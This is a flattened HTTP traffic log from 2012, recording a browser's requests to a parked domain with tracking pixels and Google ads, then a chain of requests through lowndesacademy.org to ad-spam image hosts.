GET /track.php?uid=www5098679f514358.53487159&d=information.com&sr=1176x885 HTTP/1.1 Host: www.information.com GET /track.php?uid=www5098679f514358.53487159&d=information.com&sr=1176x885 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: image/png,image/;q=0.8,/;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://www.information.com/tg.php?uid=www5098679f514358.53487159 Cookie: uid=www5098679f514358.53487159; WEBUK=WUK09	HTTP/1.1 200 OK Content-Type: image/gif Date: Tue, 06 Nov 2012 01:28:00 GMT Server: Apache/2.2.20 (Ubuntu) X-Powered-By: PHP/5.3.6-13ubuntu3.9 Content-Length: 43 Connection: close
GET /ajax/libs/jquery/1.5.2/jquery.min.js HTTP/1.1 Host: ajax.googleapis.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: / Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://www.information.com/search.php?uid=www5098679f514358.53487159	HTTP/1.1 200 OK Content-Type: text/javascript; charset=UTF-8 Vary: Accept-Encoding Content-Encoding: gzip Last-Modified: Mon, 02 Apr 2012 18:24:28 GMT Date: Thu, 01 Nov 2012 01:09:18 GMT Expires: Fri, 01 Nov 2013 01:09:18 GMT X-Content-Type-Options: nosniff Server: sffe Content-Length: 29947 X-XSS-Protection: 1; mode=block Cache-Control: public, max-age=31536000 Age: 433122
GET /img.php?www5098679f514358.53487159 HTTP/1.1 Host: www.information.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: image/png,image/;q=0.8,/;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://www.information.com/page.php?www5098679f514358.53487159 Cookie: uid=www5098679f514358.53487159; WEBUK=WUK09	HTTP/1.1 200 OK Content-Type: image/gif Date: Tue, 06 Nov 2012 01:28:00 GMT Server: Apache/2.2.20 (Ubuntu) X-Powered-By: PHP/5.3.6-13ubuntu3.9 Content-Length: 43 Connection: close
GET /js/google_lander2.js?20120806 HTTP/1.1 Host: www.information.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: / Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://www.information.com/search.php?uid=www5098679f514358.53487159 Cookie: uid=www5098679f514358.53487159; WEBUK=WUK09	HTTP/1.1 200 OK Content-Type: application/javascript Date: Tue, 06 Nov 2012 01:28:00 GMT Server: Apache/2.2.20 (Ubuntu) Last-Modified: Fri, 02 Nov 2012 19:54:58 GMT Etag: "17001f4-4c09-4cd8882a5e880" Accept-Ranges: bytes Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 4853 Connection: close
GET /js/jquery.tools.custom.min.js HTTP/1.1 Host: 208.87.32.71 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: / Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://www.information.com/search.php?uid=www5098679f514358.53487159	HTTP/1.1 200 OK Content-Type: application/x-javascript Server: nginx/0.8.54 Date: Tue, 06 Nov 2012 01:25:30 GMT Content-Length: 9659 Last-Modified: Fri, 02 Dec 2011 01:21:23 GMT Connection: close Accept-Ranges: bytes
GET /images/rs_center_left_70.gif HTTP/1.1 Host: 208.87.32.71 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: image/png,image/;q=0.8,/;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://www.information.com/search.php?uid=www5098679f514358.53487159	HTTP/1.1 200 OK Content-Type: image/gif Server: nginx/0.8.54 Date: Tue, 06 Nov 2012 01:25:31 GMT Content-Length: 7602 Last-Modified: Thu, 05 Jan 2012 01:16:56 GMT Connection: close Accept-Ranges: bytes
GET /images/rs_center_right_70.gif HTTP/1.1 Host: 208.87.32.71 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: image/png,image/;q=0.8,/;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://www.information.com/search.php?uid=www5098679f514358.53487159	HTTP/1.1 200 OK Content-Type: image/gif Server: nginx/0.8.54 Date: Tue, 06 Nov 2012 01:25:31 GMT Content-Length: 7448 Last-Modified: Thu, 05 Jan 2012 01:17:06 GMT Connection: close Accept-Ranges: bytes
GET /landerbanners/in/information.com.jpg HTTP/1.1 Host: 208.87.32.71 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: image/png,image/;q=0.8,/;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://www.information.com/search.php?uid=www5098679f514358.53487159	HTTP/1.1 200 OK Content-Type: image/jpeg Server: nginx/0.8.54 Date: Tue, 06 Nov 2012 01:25:31 GMT Content-Length: 17666 Last-Modified: Mon, 11 Jul 2011 07:11:28 GMT Connection: close Accept-Ranges: bytes
GET /apps/domainpark/domainpark.cgi?api=2&callback=_google_json_callback&output=js&adtest=off&client=dp-nameadmin22_3ph_js&channel=000106&hl=en&num_ads=0&num_radlinks=10&optimize_terms=on&categories=off&feed=afs&domain_name=www.information.com&dt=1352165283405&u_tz=60&u_his=2&u_h=885&u_w=1176&frm=1&ref=http%3A%2F%2Fwww.information.com%2F HTTP/1.1 Host: googleads.g.doubleclick.net GET /apps/domainpark/domainpark.cgi?api=2&callback=_google_json_callback&output=js&adtest=off&client=dp-nameadmin22_3ph_js&channel=000106&hl=en&num_ads=0&num_radlinks=10&optimize_terms=on&categories=off&feed=afs&domain_name=www.information.com&dt=1352165283405&u_tz=60&u_his=2&u_h=885&u_w=1176&frm=1&ref=http%3A%2F%2Fwww.information.com%2F HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: / Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://www.information.com/search.php?uid=www5098679f514358.53487159 Cookie: id=223ae1776901005b\|\|t=1350343758\|et=730\|cs=002213fd480aa30e9cef2f5d42	HTTP/1.1 200 OK Content-Type: application/javascript; charset=UTF-8 Content-Disposition: inline P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" X-Content-Type-Options: nosniff Content-Encoding: gzip Date: Tue, 06 Nov 2012 01:28:04 GMT Server: domainserver Cache-Control: private Content-Length: 1383 X-XSS-Protection: 1; mode=block
GET /images/star_24.gif HTTP/1.1 Host: 208.87.32.71 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: image/png,image/;q=0.8,/;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://www.information.com/search.php?uid=www5098679f514358.53487159	HTTP/1.1 200 OK Content-Type: image/gif Server: nginx/0.8.54 Date: Tue, 06 Nov 2012 01:25:31 GMT Content-Length: 1312 Last-Modified: Fri, 06 Jan 2012 17:17:39 GMT Connection: close Accept-Ranges: bytes
GET /favicon.ico HTTP/1.1 Host: www.information.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: image/png,image/;q=0.8,/;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,;q=0.7 Keep-Alive: 115 Connection: keep-alive Cookie: uid=www5098679f514358.53487159; WEBUK=WUK09	HTTP/1.1 200 OK Content-Type: image/x-icon Date: Tue, 06 Nov 2012 01:28:04 GMT Server: Apache/2.2.20 (Ubuntu) Last-Modified: Fri, 17 Aug 2012 19:42:54 GMT Etag: "1700c62-0-4c77b5db6ab80" Accept-Ranges: bytes Content-Length: 0 Connection: close
GET /favicon.ico HTTP/1.1 Host: lowndesacademy.org User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Cookie: BX=7153s1t89gpsl&b=3&s=9q	HTTP/1.1 404 Not Found Content-Type: text/html; charset=iso-8859-1 Date: Tue, 06 Nov 2012 01:28:02 GMT P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV" Age: 0 Connection: close Server: YTS/1.19.11
GET /statistic.htm HTTP/1.1 Host: co-stats.co.be User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://lowndesacademy.org/boxtop.html
GET /favicon.ico HTTP/1.1 Host: lowndesacademy.org User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: image/png,image/;q=0.8,/;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,;q=0.7 Keep-Alive: 115 Connection: keep-alive Cookie: BX=7153s1t89gpsl&b=3&s=9q
GET /statistic.htm HTTP/1.1 Host: co-stats.co.be User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://lowndesacademy.org/boxtop.html
GET /includes/images/main-bg.jpg HTTP/1.1 Host: www.bz.cm User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: image/png,image/;q=0.8,/;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://statsncount.bz.cm/ads.php?message=inactive
GET /includes/images/inside-logo.png HTTP/1.1 Host: www.bz.cm User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: image/png,image/;q=0.8,/;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://statsncount.bz.cm/ads.php?message=inactive
GET /banners/spacer.gif HTTP/1.1 Host: www.bz.cm User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: image/png,image/;q=0.8,/;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://statsncount.bz.cm/ads.php?message=inactive
GET /images/ultra.gif HTTP/1.1 Host: statsncount.bz.cm User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: image/png,image/;q=0.8,/;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://statsncount.bz.cm/ads.php?message=inactive	HTTP/1.1 200 OK Content-Type: image/gif Date: Tue, 06 Nov 2012 01:27:59 GMT Server: Apache Last-Modified: Wed, 08 Jun 2011 20:32:45 GMT Etag: "581c250-4b01-4a5393d2e3540" Accept-Ranges: bytes Content-Length: 19201 Connection: close
GET /images/geary1.gif HTTP/1.1 Host: statsncount.bz.cm User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: image/png,image/;q=0.8,/;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://statsncount.bz.cm/ads.php?message=inactive	HTTP/1.1 200 OK Content-Type: image/gif Date: Tue, 06 Nov 2012 01:27:59 GMT Server: Apache Last-Modified: Wed, 08 Jun 2011 20:40:47 GMT Etag: "581c251-37d2-4a53959e8f1c0" Accept-Ranges: bytes Content-Length: 14290 Connection: close
GET /images/workfromhome.gif HTTP/1.1 Host: statsncount.bz.cm User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: image/png,image/;q=0.8,/;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://statsncount.bz.cm/ads.php?message=inactive	HTTP/1.1 200 OK Content-Type: image/gif Date: Tue, 06 Nov 2012 01:27:59 GMT Server: Apache Last-Modified: Thu, 09 Jun 2011 00:22:08 GMT Etag: "581c252-53c4-4a53c7184ec00" Accept-Ranges: bytes Content-Length: 21444 Connection: close
GET /images/lotto.gif HTTP/1.1 Host: statsncount.bz.cm User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: image/png,image/;q=0.8,/;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://statsncount.bz.cm/ads.php?message=inactive
GET /images/autowealth.jpg HTTP/1.1 Host: statsncount.bz.cm User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: image/png,image/;q=0.8,/;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://statsncount.bz.cm/ads.php?message=inactive
GET /images/energy.gif HTTP/1.1 Host: statsncount.bz.cm User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: image/png,image/;q=0.8,/;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://statsncount.bz.cm/ads.php?message=inactive
GET /ads.php?message=inactive HTTP/1.1 Host: statsncount.bz.cm User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://statsncount.bz.cm/in.cgi?16